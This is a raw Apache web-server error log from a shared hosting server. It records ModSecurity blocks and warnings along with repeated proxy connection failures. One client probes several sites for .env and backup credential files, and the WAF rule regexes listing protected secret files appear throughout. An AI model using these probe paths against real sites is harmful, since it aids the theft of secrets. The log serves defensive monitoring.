[Tue May 26 16:51:09.605113 2026] [security2:error] [pid 823496:tid 823628] [client 20.206.111.149:25464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWCJZa08mrtyBNpA4PjswAAAAA"]
[Tue May 26 16:51:10.113091 2026] [security2:error] [pid 823496:tid 823610] [remote 109.228.50.118:39010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWCJZa08mrtyBNpA4PjvQAAa28"]
[Tue May 26 16:51:10.339159 2026] [security2:error] [pid 817651:tid 817874] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCJdlGRCPPN1dS2y3BQQAAAOI"]
[Tue May 26 16:51:10.346517 2026] [proxy:error] [pid 823496:tid 823719] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:10.346578 2026] [proxy_http:error] [pid 823496:tid 823719] [client 208.84.100.197:51692] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:10.347186 2026] [proxy:error] [pid 823496:tid 823719] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:10.347226 2026] [proxy_http:error] [pid 823496:tid 823719] [client 208.84.100.197:51692] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:10.704072 2026] [proxy:error] [pid 823496:tid 823655] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:10.704113 2026] [proxy_http:error] [pid 823496:tid 823655] [client 208.84.100.197:50772] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:10.704735 2026] [proxy:error] [pid 823496:tid 823655] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:10.704767 2026] [proxy_http:error] [pid 823496:tid 823655] [client 208.84.100.197:50772] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.127572 2026] [security2:error] [pid 817651:tid 817884] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCJdlGRCPPN1dS2y3BSAAAAOw"]
[Tue May 26 16:51:11.191672 2026] [security2:error] [pid 823496:tid 823645] [client 31.56.177.209:54015] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.177.56.31.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWCJpa08mrtyBNpA4PjxwAAABE"], referer: https://freshmindsolutions.com/2019/07/12/you-must-try-20-secret-of-digital-transform/
[Tue May 26 16:51:11.191801 2026] [security2:error] [pid 823496:tid 823645] [client 31.56.177.209:54015] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWCJpa08mrtyBNpA4PjxwAAABE"], referer: https://freshmindsolutions.com/2019/07/12/you-must-try-20-secret-of-digital-transform/
[Tue May 26 16:51:11.511038 2026] [proxy:error] [pid 823496:tid 823648] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.511099 2026] [proxy_http:error] [pid 823496:tid 823648] [client 208.84.100.197:51780] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.511125 2026] [security2:error] [pid 817651:tid 817806] [client 208.84.100.197:51740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahWCJ9lGRCPPN1dS2y3BUQAAAJ4"]
[Tue May 26 16:51:11.511186 2026] [proxy:error] [pid 823496:tid 823694] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.511229 2026] [proxy_http:error] [pid 823496:tid 823694] [client 208.84.100.197:51772] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.511321 2026] [proxy:error] [pid 823496:tid 823732] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.511375 2026] [proxy_http:error] [pid 823496:tid 823732] [client 208.84.100.197:51704] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.511747 2026] [proxy:error] [pid 823496:tid 823648] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.511778 2026] [proxy_http:error] [pid 823496:tid 823648] [client 208.84.100.197:51780] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.511905 2026] [security2:error] [pid 817651:tid 817810] [client 208.84.100.197:51720] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahWCJ9lGRCPPN1dS2y3BUwAAAKI"]
[Tue May 26 16:51:11.511935 2026] [proxy:error] [pid 823496:tid 823694] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.511975 2026] [proxy_http:error] [pid 823496:tid 823694] [client 208.84.100.197:51772] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.512154 2026] [proxy:error] [pid 823496:tid 823684] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.512232 2026] [proxy_http:error] [pid 823496:tid 823684] [client 208.84.100.197:51912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.512294 2026] [proxy:error] [pid 817651:tid 817877] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.512339 2026] [proxy_http:error] [pid 817651:tid 817877] [client 208.84.100.197:51814] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.512406 2026] [proxy:error] [pid 823496:tid 823716] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.512458 2026] [proxy_http:error] [pid 823496:tid 823716] [client 208.84.100.197:51878] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.512530 2026] [security2:error] [pid 823496:tid 823687] [client 208.84.100.197:51748] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahWCJ5a08mrtyBNpA4Pj0AAAADs"]
[Tue May 26 16:51:11.512607 2026] [proxy:error] [pid 823496:tid 823722] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.512685 2026] [proxy_http:error] [pid 823496:tid 823722] [client 208.84.100.197:51934] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.512782 2026] [proxy:error] [pid 823496:tid 823732] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.512821 2026] [proxy_http:error] [pid 823496:tid 823732] [client 208.84.100.197:51704] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.512910 2026] [proxy:error] [pid 817651:tid 817877] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.512911 2026] [proxy:error] [pid 823496:tid 823703] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.512944 2026] [proxy_http:error] [pid 817651:tid 817877] [client 208.84.100.197:51814] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.512951 2026] [proxy_http:error] [pid 823496:tid 823703] [client 208.84.100.197:51926] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.513022 2026] [security2:error] [pid 823496:tid 823711] [client 208.84.100.197:51764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahWCJ5a08mrtyBNpA4Pj1wAAAFM"]
[Tue May 26 16:51:11.513136 2026] [proxy:error] [pid 817651:tid 817845] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.513209 2026] [proxy_http:error] [pid 817651:tid 817845] [client 208.84.100.197:51952] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.513732 2026] [proxy:error] [pid 817651:tid 817799] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.513773 2026] [proxy_http:error] [pid 817651:tid 817799] [client 208.84.100.197:51858] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.514154 2026] [proxy:error] [pid 817651:tid 817845] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.514200 2026] [proxy:error] [pid 823496:tid 823684] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.514206 2026] [proxy_http:error] [pid 817651:tid 817845] [client 208.84.100.197:51952] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.514786 2026] [proxy:error] [pid 817651:tid 817820] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.514825 2026] [proxy_http:error] [pid 817651:tid 817820] [client 208.84.100.197:51910] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.515105 2026] [proxy:error] [pid 817651:tid 817881] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.515187 2026] [proxy_http:error] [pid 817651:tid 817881] [client 208.84.100.197:51902] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.515286 2026] [proxy:error] [pid 817651:tid 817795] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.515338 2026] [proxy_http:error] [pid 817651:tid 817795] [client 208.84.100.197:51870] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.515561 2026] [proxy_http:error] [pid 823496:tid 823684] [client 208.84.100.197:51912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.515636 2026] [proxy:error] [pid 817651:tid 817820] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.515669 2026] [proxy_http:error] [pid 817651:tid 817820] [client 208.84.100.197:51910] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.515681 2026] [proxy:error] [pid 823496:tid 823722] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.515724 2026] [proxy_http:error] [pid 823496:tid 823722] [client 208.84.100.197:51934] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.515964 2026] [proxy:error] [pid 817651:tid 817799] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.516000 2026] [proxy_http:error] [pid 817651:tid 817799] [client 208.84.100.197:51858] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.516085 2026] [proxy:error] [pid 817651:tid 817795] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.516122 2026] [proxy_http:error] [pid 817651:tid 817795] [client 208.84.100.197:51870] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.516252 2026] [proxy:error] [pid 817651:tid 817881] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.516389 2026] [proxy_http:error] [pid 817651:tid 817881] [client 208.84.100.197:51902] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.516638 2026] [proxy:error] [pid 817651:tid 817850] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.516680 2026] [proxy_http:error] [pid 817651:tid 817850] [client 208.84.100.197:51826] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.516825 2026] [proxy:error] [pid 817651:tid 817867] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.516885 2026] [proxy_http:error] [pid 817651:tid 817867] [client 208.84.100.197:51810] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.516981 2026] [proxy:error] [pid 817651:tid 817875] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.517028 2026] [proxy_http:error] [pid 817651:tid 817875] [client 208.84.100.197:51854] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.517221 2026] [proxy:error] [pid 817651:tid 817862] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.517258 2026] [proxy_http:error] [pid 817651:tid 817862] [client 208.84.100.197:51842] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.516275 2026] [proxy:error] [pid 823496:tid 823724] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.517362 2026] [proxy:error] [pid 817651:tid 817897] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.517397 2026] [proxy_http:error] [pid 823496:tid 823724] [client 208.84.100.197:51722] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.517401 2026] [proxy_http:error] [pid 817651:tid 817897] [client 208.84.100.197:51774] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.517544 2026] [proxy:error] [pid 817651:tid 817868] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.517585 2026] [proxy_http:error] [pid 817651:tid 817868] [client 208.84.100.197:51730] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.517643 2026] [proxy:error] [pid 823496:tid 823703] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.517689 2026] [proxy_http:error] [pid 823496:tid 823703] [client 208.84.100.197:51926] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.517898 2026] [proxy:error] [pid 817651:tid 817862] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.517932 2026] [proxy_http:error] [pid 817651:tid 817862] [client 208.84.100.197:51842] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518014 2026] [proxy:error] [pid 817651:tid 817875] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518007 2026] [proxy:error] [pid 823496:tid 823716] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518052 2026] [proxy_http:error] [pid 817651:tid 817875] [client 208.84.100.197:51854] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518092 2026] [proxy_http:error] [pid 823496:tid 823716] [client 208.84.100.197:51878] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518139 2026] [proxy:error] [pid 817651:tid 817897] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518180 2026] [proxy_http:error] [pid 817651:tid 817897] [client 208.84.100.197:51774] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518260 2026] [proxy:error] [pid 823496:tid 823649] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518270 2026] [proxy:error] [pid 817651:tid 817856] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518295 2026] [proxy_http:error] [pid 823496:tid 823649] [client 208.84.100.197:51892] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518316 2026] [proxy_http:error] [pid 817651:tid 817856] [client 208.84.100.197:51944] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518416 2026] [proxy:error] [pid 817651:tid 817803] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518419 2026] [proxy:error] [pid 823496:tid 823635] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518459 2026] [proxy_http:error] [pid 817651:tid 817803] [client 208.84.100.197:51796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518467 2026] [proxy_http:error] [pid 823496:tid 823635] [client 208.84.100.197:51968] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518557 2026] [proxy:error] [pid 823496:tid 823631] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518637 2026] [proxy_http:error] [pid 823496:tid 823631] [client 208.84.100.197:51970] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518668 2026] [proxy:error] [pid 817651:tid 817867] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518742 2026] [proxy_http:error] [pid 817651:tid 817867] [client 208.84.100.197:51810] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518757 2026] [proxy:error] [pid 823496:tid 823665] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518803 2026] [proxy_http:error] [pid 823496:tid 823665] [client 208.84.100.197:51966] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518843 2026] [proxy:error] [pid 817651:tid 817850] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518891 2026] [proxy:error] [pid 823496:tid 823630] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.518895 2026] [proxy_http:error] [pid 817651:tid 817850] [client 208.84.100.197:51826] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.518937 2026] [proxy_http:error] [pid 823496:tid 823630] [client 208.84.100.197:51792] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.519031 2026] [proxy:error] [pid 823496:tid 823724] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.519043 2026] [proxy:error] [pid 817651:tid 817868] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.519069 2026] [proxy_http:error] [pid 823496:tid 823724] [client 208.84.100.197:51722] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.519088 2026] [proxy_http:error] [pid 817651:tid 817868] [client 208.84.100.197:51730] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.519155 2026] [proxy:error] [pid 823496:tid 823649] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.519187 2026] [proxy_http:error] [pid 823496:tid 823649] [client 208.84.100.197:51892] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.519201 2026] [proxy:error] [pid 817651:tid 817803] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.519237 2026] [proxy_http:error] [pid 817651:tid 817803] [client 208.84.100.197:51796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.519281 2026] [proxy:error] [pid 823496:tid 823631] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.519316 2026] [proxy:error] [pid 817651:tid 817856] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.519339 2026] [proxy_http:error] [pid 823496:tid 823631] [client 208.84.100.197:51970] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.519360 2026] [proxy_http:error] [pid 817651:tid 817856] [client 208.84.100.197:51944] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.519457 2026] [proxy:error] [pid 823496:tid 823635] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.519500 2026] [proxy_http:error] [pid 823496:tid 823635] [client 208.84.100.197:51968] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.519702 2026] [proxy:error] [pid 823496:tid 823630] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.519741 2026] [proxy_http:error] [pid 823496:tid 823630] [client 208.84.100.197:51792] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.519829 2026] [proxy:error] [pid 823496:tid 823665] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.519962 2026] [proxy_http:error] [pid 823496:tid 823665] [client 208.84.100.197:51966] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.903306 2026] [proxy:error] [pid 817651:tid 817880] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.903383 2026] [proxy_http:error] [pid 817651:tid 817880] [client 208.84.100.197:51740] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.903963 2026] [proxy:error] [pid 817651:tid 817880] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:11.903998 2026] [proxy_http:error] [pid 817651:tid 817880] [client 208.84.100.197:51740] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:51:11.989453 2026] [security2:error] [pid 823496:tid 823641] [client 31.56.177.209:54066] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWCJ5a08mrtyBNpA4Pj4wAAAA0"], referer: https://freshmindsolutions.com/2019/07/12/you-must-try-20-secret-of-digital-transform/
[Tue May 26 16:51:12.346716 2026] [security2:error] [pid 823496:tid 823641] [client 31.56.177.209:54066] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWCJ5a08mrtyBNpA4Pj4wAAAA0"], referer: https://freshmindsolutions.com/2019/07/12/you-must-try-20-secret-of-digital-transform/
[Tue May 26 16:51:12.346788 2026] [security2:error] [pid 823496:tid 823641] [client 31.56.177.209:54066] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "freshmindsolutions.com"] [uri "/wp-comments-post.php"] [unique_id "ahWCJ5a08mrtyBNpA4Pj4wAAAA0"], referer: https://freshmindsolutions.com/2019/07/12/you-must-try-20-secret-of-digital-transform/
[Tue May 26 16:51:12.549113 2026] [security2:error] [pid 817651:tid 817800] [client 208.84.100.197:51720] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.masonicarkfoundation.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahWCKNlGRCPPN1dS2y3BdQAAAJg"]
[Tue May 26 16:51:12.549886 2026] [proxy:error] [pid 823496:tid 823680] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:51:12.550006 2026] [proxy_http:error] [pid 823496:tid 823680] [client 208.84.100.197:51748] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
